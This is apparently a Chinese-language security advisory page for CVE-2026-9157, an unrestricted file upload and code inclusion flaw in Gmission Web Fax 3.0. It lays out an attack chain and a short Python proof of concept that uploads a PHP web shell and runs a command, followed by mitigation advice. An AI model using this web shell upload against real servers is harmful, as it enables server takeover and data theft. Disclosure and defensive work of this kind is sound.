CVE-2026-9157 CVSS 8.4 高危

CVE-2026-9157 Gmission Web Fax 远程代码包含漏洞

披露日期: 2026-05-21

来源: 09832df1-09c1-45b4-8a85-16c601d30feb

漏洞信息

漏洞编号

CVE-2026-9157

漏洞类型

远程代码包含

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Gmission Web Fax

漏洞概述

Gmission Web Fax存在输入验证不当及危险类型文件不受限上传漏洞。攻击者可利用该漏洞上传恶意文件并执行远程代码包含攻击。受影响版本为3.0至3.1之前版本。该漏洞可能导致服务器被完全控制，造成数据泄露或破坏。

技术细节

该漏洞源于Gmission Web Fax在处理用户上传的文件时，未对文件类型及内容进行严格的验证和过滤。攻击者可以上传包含恶意代码的文件（如Web Shell）。由于系统存在远程代码包含漏洞，攻击者可以通过特定的请求路径包含并执行该上传文件。尽管CVSS向量显示攻击复杂度为本地（AV:L），但结合文件上传特性，可能通过网络接口触发。一旦代码被执行，攻击者即可在服务器权限下执行任意命令，获取高权限系统访问。

攻击链分析

STEP 1

侦察

识别运行Gmission Web Fax 3.0版本的目标服务器。

STEP 2

文件上传

利用不受限的文件上传功能，发送包含恶意代码的PHP文件。

STEP 3

代码包含

通过远程代码包含漏洞或直接访问，触发服务器解析并执行上传的恶意代码。

STEP 4

权限获取

执行系统命令，获取服务器控制权，窃取数据或破坏系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-9157
import requests

target = "http://example.com/fax/upload"
malicious_file = {'file': ('exploit.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')}

response = requests.post(target, files=malicious_file)
if response.status_code == 200:
    print("Upload potentially successful.")
    # Attempt to trigger the inclusion/execution
    exec_url = "http://example.com/fax/uploads/exploit.php"
    r = requests.get(exec_url, params={'cmd': 'id'})
    print(r.text)

影响范围

Gmission Web Fax 3.0

Gmission Web Fax < 3.1

防御指南

临时缓解措施

建议在升级前，通过Web应用防火墙（WAF）拦截异常的文件上传请求，并手动检查服务器上传目录中是否存在可疑脚本文件，及时删除。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9157
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9157
3 Details https://www.cvedetails.com/cve/CVE-2026-9157/
4 VulDB https://vuldb.com/cve/CVE-2026-9157
5 Link https://www.gmission.co.kr/fax1

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表